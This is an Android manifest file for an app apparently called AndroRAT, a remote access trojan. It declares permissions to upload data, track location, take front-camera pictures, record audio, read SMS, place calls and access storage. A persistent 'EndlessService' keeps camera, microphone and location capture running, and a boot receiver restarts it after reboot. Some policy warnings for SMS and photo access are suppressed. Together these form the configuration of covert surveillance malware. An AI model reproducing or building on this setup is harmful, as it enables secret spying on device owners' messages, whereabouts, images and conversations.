<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    tools:ignore="SelectedPhotoAccess">

    <!-- To upload data-->
    <uses-permission android:name="android.permission.INTERNET" />

    <!-- For endless service-->
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />

    <!-- For trigger service on low battery time-->
    <uses-permission
        android:name="android.permission.WAKE_LOCK"
        tools:node="replace" />

    <!-- For restarting service after the device is rebooted-->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

    <!-- To get location-->
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />

    <!-- To take picture with front camera-->
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_CAMERA" />
    <uses-permission android:name="android.permission.CAMERA" />

    <uses-feature
        android:name="android.hardware.camera"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.front"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.camera.autofocus"
        android:required="false" />

    <!-- To record voice -->
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MICROPHONE" />

    <!-- TODO - OTHER PERMISSION  OPTIMIZE LATER-->

    <!-- SMS READING-->
    <uses-permission android:name="android.permission.READ_SMS"
        tools:ignore="SmsAndCallLogPolicy" />

    <!-- CALL PHONE-->
    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />
    <uses-permission android:name="android.permission.CALL_PHONE" />

    <!--    Permission for files varies according to device's sdk version-->
    <!--    For Android 6.0 (sdk 23) "<=" up to "<" Android 10 (sdk 29)-->
    <uses-permission-sdk-23
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        android:maxSdkVersion="28" />
    <!--    todo compare with vid compose-->
    <uses-permission-sdk-23
        android:name="android.permission.READ_EXTERNAL_STORAGE"
        android:maxSdkVersion="28" />

    <uses-permission-sdk-23 android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />

    <!--   Android 10 (sdk 29) "<=" up to "<" Android 13 (sdk 33) -->
    <!--   you don't need to use the READ_EXTERNAL_STORAGE permission
    on devices that run Android 10 (API level 29) or higher,
    as long as your app targets Android 10 or higher-->

    <!--Android 13 feature specific -->
    <!--todo implement android14 specific functions-->
    <uses-permission
        android:name="android.permission.READ_MEDIA_IMAGES"
        android:minSdkVersion="33"
        tools:ignore="PhotoAndVideoPolicy" />
    <uses-permission
        android:name="android.permission.READ_MEDIA_VIDEO"
        android:minSdkVersion="33"
        tools:ignore="PhotoAndVideoPolicy" />
    <uses-permission
        android:name="android.permission.READ_MEDIA_AUDIO"
        android:minSdkVersion="33"
        tools:ignore="SelectedPhotoAccess" />

    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

    <!--below code line only works in android 10 (sdk 29), will not work in android 11 (sdk30)-->
    <!--android:requestLegacyExternalStorage="true"-->

    <application
        android:name=".core.app.AndroRatApp"
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:requestLegacyExternalStorage="true"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.AndroRAT"
        android:usesCleartextTraffic="true"
        tools:targetApi="31">

        <activity
            android:name=".core.ui.MainActivity"
            android:configChanges="uiMode|locale|layoutDirection|screenSize|screenLayout|orientation"
            android:exported="true"
            android:theme="@style/Theme.AndroRAT">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <service
            android:name=".core.data.services.endless_service.EndlessService"
            android:enabled="true"
            android:exported="false"
            android:foregroundServiceType="camera|microphone|location"
            android:stopWithTask="false" />

        <receiver
            android:name=".core.data.services.endless_service.StartReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

    </application>

</manifest>